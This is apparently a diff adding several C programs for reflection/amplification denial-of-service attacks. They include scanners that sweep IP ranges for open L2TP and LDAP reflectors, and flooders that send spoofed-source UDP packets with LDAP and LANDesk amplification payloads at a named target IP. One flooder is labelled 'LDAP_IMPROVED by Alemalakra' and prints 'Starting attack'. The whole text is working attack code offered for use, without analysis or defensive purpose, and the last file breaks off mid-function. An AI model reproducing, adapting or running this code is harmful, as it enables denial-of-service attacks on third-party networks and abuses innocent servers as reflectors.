void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == 1701)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, "\xc8\x02\x00\x4c\x00\x00\x00\x00\x00\x00\x00\x00\x80\x08\x00\x00\x00\x00\x00\x01\x80\x08\x00\x00\x00\x02\x01\x00\x80\x0a\x00\x00\x00\x03\x00\x00\x00\x03\x80\x0a\x00\x00\x00\x04\x00\x00\x00\x00\x80\x0c\x00\x00\x00\x07\x74\x65\x73\x74\x80\x08\x00\x00\x00\x08\x2a\x2a\x80\x08\x00\x00\x00\x0a\x00\x04", 74);
|
||||
int sizeofpayload = 74;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(1701);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Host/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "B/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Running Thrds");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <ip range start (192.168.0.0)> <ip range end (192.168.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,230 @@
|
|||
/*
|
||||
private amplification
|
||||
landesk remote management amplification.
|
||||
|
||||
Transmissional.
|
||||
*/
|
||||
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
/*
|
||||
let us define container sets.
|
||||
we could use this to initialise more data response.
|
||||
*/
|
||||
|
||||
#define get_response 0x002
|
||||
#define meta_iso_req 0x00FFFF
|
||||
#define mobset_rw_se 0x000000000
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 16; /* we set the payload length as an individual integer as sizeof() is NOT reliable */
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100"); /* jason this wasn't necessary yano */
|
||||
}
|
||||
#define get_iso "\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06"
|
||||
#define net_iso "\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06"
|
||||
void setup_udp_header(struct udphdr *udph) // setup our little cutie
|
||||
{
|
||||
/* we are establishing a full form connection to
|
||||
snmp. this should force release a get response
|
||||
which should include device data and traffic_D.
|
||||
response should be 1000+
|
||||
*/
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(1761);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x54\x4e\x4d\x50\x04\x00\x00\x00\x54\x4e\x4d\x45\x00\x00\x04\x00", 16);
|
||||
udph->len=htons(sizeof(struct udphdr) + 16);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n"); // errors
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026); // <-- you should try to play around with this
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n"); // errors
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,209 @@
|
|||
/* ALEMALAKRA RULES */
|
||||
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 67;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(389);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x30\x84\x00\x00\x00\x2d\x02\x01\x01\x63\x84\x00\x00\x00\x24\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x84\x00\x00\x00\x00\x00", 67);
|
||||
udph->len=htons(sizeof(struct udphdr) + 67);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
printf("[+] LDAP_IMPROVED [+] Somenthing are wrong, try again. [+] LDAP_IMPROVED [+]\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
printf("[+] LDAP_IMPROVED [+] Somenthing are wrong, try again. [+] LDAP_IMPROVED [+]\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
printf("[+] LDAP_IMPROVED by Alemalakra [+]\n");
|
||||
fprintf(stdout, "[+] Use: %s <IP> <PORT> <LDAP LIST> <THREADS> <PPS (-1)> <TIME>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
printf("[+] Starting attack... [+]\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,172 @@
|
|||
/* ALEMALAKRA RULES */
|
||||
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <signal.h>
|
||||
#include <sys/time.h>
|
||||
#include <sys/types.h>
|
||||
#include <math.h>
|
||||
#include <ctype.h>
|
||||
#include <errno.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
|
||||
volatile int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
volatile int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
char payload[] =
|
||||
"\x30\x84\x00\x00\x00\x2d\x02\x01\x01\x63\x84\x00\x00\x00\x24\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x84\x00\x00\x00\x00\x00";
|
||||
|
||||
size = sizeof(payload);
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memset(buf, 0x01, 67);
|
||||
int sizeofpayload = 67;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
printf("[+] LDAP_IMPROVED [+] Somenthing are wrong, try again. [+] LDAP_IMPROVED [+]\n");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(389);
|
||||
sendto(sock,payload,size,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=size;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *recievethread()
|
||||
{
|
||||
printf("\n");
|
||||
int saddr_size, data_size, sock_raw;
|
||||
